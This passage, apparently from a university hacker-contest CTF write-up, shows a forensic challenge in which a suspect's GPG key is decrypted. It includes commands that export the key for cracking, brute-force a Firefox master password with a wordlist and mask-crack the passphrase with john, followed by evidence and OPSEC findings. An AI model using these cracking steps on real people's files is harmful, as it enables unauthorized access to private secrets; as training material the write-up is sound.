style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span>Key is Qpw151ASDter15Ytr%1z \nMessage: DATA=root:x:0:0::\/root:\/bin\/bash\nuser:x:10000:10000:usd{badEncryption1234567}:\/home\/user:\/bin\/bash\nbin:x:1:1::\/:\/usr\/bin\/nologin\n<\/pre><\/div>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a id=\"flag-10-important.gpg\"><\/a>Flag 10: important.gpg<\/h4>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>NOTE: This challenge contained a bug and not solvable during the contest.\nIf you attempted to solve it and included the correct approach within your write-up, it counts as solved.<\/p><\/blockquote>\n\n\n\n<p>The file <strong>\/mnt\/home\/jim\/Documents\/important.gpg<\/strong> is obviously interesting and may contains a flag. However, it is encrypted\nusing <em>gpg<\/em> and we need the correct private key to decrypt it. First, we should check who is capable of decrypting the file:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>gpg2 --version\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">gpg (GnuPG) 2.0.19<\/span>\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">#  <\/span>check recipients of encrypted file\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$  <\/span>gpg2 --list-only -v -d  \/mnt\/home\/jim\/Documents\/important.gpg\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">gpg: public key is 83A4842F<\/span>\n<\/pre><\/div>\n\n\n\n<p>We find that the key <strong>83A4842F<\/strong> can perform decryption. This key probably belongs to jim, and we should check his\nkeyring:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>gpg2 --import \/mnt\/home\/jim\/.gnupg\/secring.gpg\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">gpg: key B6524D89: secret key imported<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">gpg: key B6524D89: \"pwnicorn &lt;pwnicorn@evil.com&gt;\" not changed<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">gpg: Total number processed: 1<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">gpg:              unchanged: 1<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">gpg:       secret keys read: 1<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">gpg:   secret keys imported: 1<\/span>\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$  <\/span>gpg2 --list-secret-keys\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">sec   2048R\/B6524D89 2022-02-07<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">uid                  pwnicorn &lt;pwnicorn@evil.com&gt;<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">ssb   2048R\/*83A4842F* 2022-02-07<\/span>\n<\/pre><\/div>\n\n\n\n<p>Indeed, it belongs to jim, but we do not know the passphrase for this key. We can use tools like <strong>gpg2john<\/strong> to create a\ncrackable hash for the key:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>gpg2 -a --export-secret-key pwnicorn &gt; key.asc\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>gpg2john key.asc &gt; gpghash\n<\/pre><\/div>\n\n\n\n<p>Unfortunately, it is not crackable using common wordlists. When thinking about other approaches, password reuse could\nbe a possibility. Since firefox was used earlier, we can check for passwords stored by firefox. Indeed, we find that\nthere is a password store, but it is encrypted with a master password. We can try to crack the master password using\ntools like <strong>firefox_decrypt<\/strong> or <strong>mozilla2john<\/strong>. This is successful:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>parallel <span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'pw=$(echo {}); echo $pw | python3 firefox_decrypt.py --no-interactive --choice 2 2&gt;&amp;1 &gt;\/dev\/null | grep \"Password:\" &amp;&amp; echo \"pw is \"$pw'<\/span>&lt; \/usr\/share\/wordlists\/rockyou.txt\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#99!!!@!#!#@&amp;#%^'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#08!!!@!#!#@&amp;#^&amp;'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#03!!!@!#!#@&amp;#&amp;~'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#48!!!@!#!#@&amp;#~&amp;'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#00!!!@!#!#@&amp;#!^'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#02!!!@!#!#@&amp;#@@'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#22!!!@!#!#@&amp;#@^'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#85!!!@!#!#@&amp;#&amp;^'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#37!!!@!#!#@&amp;#~*'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#35!!!@!#!#@&amp;#^!'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#95!!!@!#!#@&amp;#@~'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#44!!!@!#!#@&amp;#~*'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#08!!!@!#!#@&amp;#&amp;!'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#80!!!@!#!#@&amp;#~!'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#67!!!@!#!#@&amp;#!&amp;'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#67!!!@!#!#@&amp;#&amp;!'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#19!!!@!#!#@&amp;#%!'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#66!!!@!#!#@&amp;#*!'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Password: '&amp;#94!!!@!#!#@&amp;#@&amp;'<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">pw is loveyou2<\/span>\n<\/pre><\/div>\n\n\n\n<p>We find several passwords that follow the same pattern: <strong>&amp;#[0-9]{2}!!!@!#!#@&amp;^#[!@~*%^&amp;]{2}<\/strong>. None of them works\nfor the <em>gpg<\/em> key. However, we can assume that also the gpg key password follows the same pattern:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>john gpghash --mask<span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'&amp;#?1?1!!!@!#!#@&amp;^#?2?2'<\/span> -1<span class=\"o\" style=\"background: #263238;color: #89DDFF\">=[<\/span><span class=\"m\" style=\"background: #263238;color: #F78C6C\">0<\/span>-9<span class=\"o\" style=\"background: #263238;color: #89DDFF\">]<\/span> -2<span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'[!@~*%^&amp;]'<\/span> \n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...&lt;SNIP&gt;...<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">&amp;#59!!!@!#!#@&amp;^#@* (pwnicorn)<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...&lt;SNIP&gt;...<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">Session completed<\/span>\n<\/pre><\/div>\n\n\n\n<p>Now we now the <em>gpg<\/em> keys password and can decrypt the message:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">student@host ~<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">$<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">gpg<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">d<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">home<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">jim<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Documents<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">\/<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">important<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">gpg<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"err\" style=\"background: #263238;color: #FF5370\">#<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">Enter<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">PW<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">customer<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">id<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">decryption<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">key<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">paid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"mi\" style=\"background: #263238;color: #F78C6C\">2955369508<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">usd<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">{<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">74725<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">d3f3d45e5ac68ed<\/span><span class=\"err\" style=\"background: #263238;color: #FF5370\">}<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">SNIP<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<\/pre><\/div>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><a id=\"derivable-information\"><\/a>Derivable Information<\/h3>\n\n\n\n<hr class=\"wp-block-separator\" \/>\n\n\n\n<ul class=\"wp-block-list\"><li>From the bought car we know that either the car was bought or sold by the suspect, which can lead to further possibilities to investigate.<\/li><li>From a shopping cart cookie, it can be deduced that the suspect is of <em>above average height<\/em>.<\/li><li>From the deleted <em>Thunderbird<\/em> sent file we know that the suspect is involved with the hacker group <em>evil<\/em> and the name of an additional member <em>Leon<\/em>.<\/li><li>From a message hidden in a picture, the location of the suspect can be approximated.<\/li><li>From the boarding pass, we know that the suspect took a flight to Berlin and the full name <em>Jack Hack<\/em><\/li><li>From the deleted wireshark capture evidence can be found that the suspect conducted an attack on a web service.<\/li><li>From the decrypted file <strong>important.gpg<\/strong> it is possible to deduct that the group <em>evil<\/em> is involved in a ransomware scheme. <\/li><\/ul>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><a id=\"opsec-fails\"><\/a>OPSEC - Fails<\/h3>\n\n\n\n<hr class=\"wp-block-separator\" \/>\n\n\n\n<p>This section contains some OPSEC failures that can be found on the foreign system.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a id=\"vpn-configuration\"><\/a>VPN configuration<\/h4>\n\n\n\n<p>The VPN configuration file located under <strong>~\/.vpn.conf<\/strong> is not configured to send DNS request via the VPN connection,\nwhich makes the user vulnerable to various attacks leading to a loss of anonymity.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a id=\".zshrc\"><\/a>.zshrc<\/h4>\n\n\n\n<p>Because the command of the alias <strong>enc<\/strong> is enclosed with <strong>\"<\/strong>, it will evaluate <strong>$(pass symkey)<\/strong> as soon zsh is started.\nThis means the password <strong>symkey<\/strong> will be stored as clear text for the duration of the session. A local attacker could\nread this password without much effort.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a id=\"same-username-for-different-services\"><\/a>Same username for different services<\/h4>\n\n\n\n<p>The hacker used the alias <strong>pwnic0rn<\/strong> for illegal activities, as well as username for different web services. There are many\nreasons why this is a bad practice, as could be observed in the case against <a href=\"https:\/\/arstechnica.com\/information-technology\/2013\/10\/silk-road-mastermind-unmasked-by-rookie-goofs-complaint-alleges\/\" target=\"_blank\" rel=\"noopener\">silkroad<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In the summer semester of 2022, our \"Hacker Contest\" will be held again at Darmstadt University (TU) and Darmstadt University of Applied Sciences (h_da). In the popular course, students get real insights into IT security and gain hands-on experience with tools and methods to search for vulnerabilities in networks and systems within our PentestLab. As [&hellip;]<\/p>\n","protected":false},"author":91,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"off","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"categories":[76],"tags":[152,153,150,64,128,24,86,151],"class_list":["post-18389","post","type-post","status-publish","format-standard","hentry","category-news","tag-education-2","tag-hacker-contest-2","tag-hacker-contest","tag-security-analysis","tag-security-analysis-en","tag-security-research","tag-security-research-en","tag-training"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/posts\/18389","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/91"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=18389"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/posts\/18389\/revisions"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=18389"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/categories?post=18389"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/tags?post=18389"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}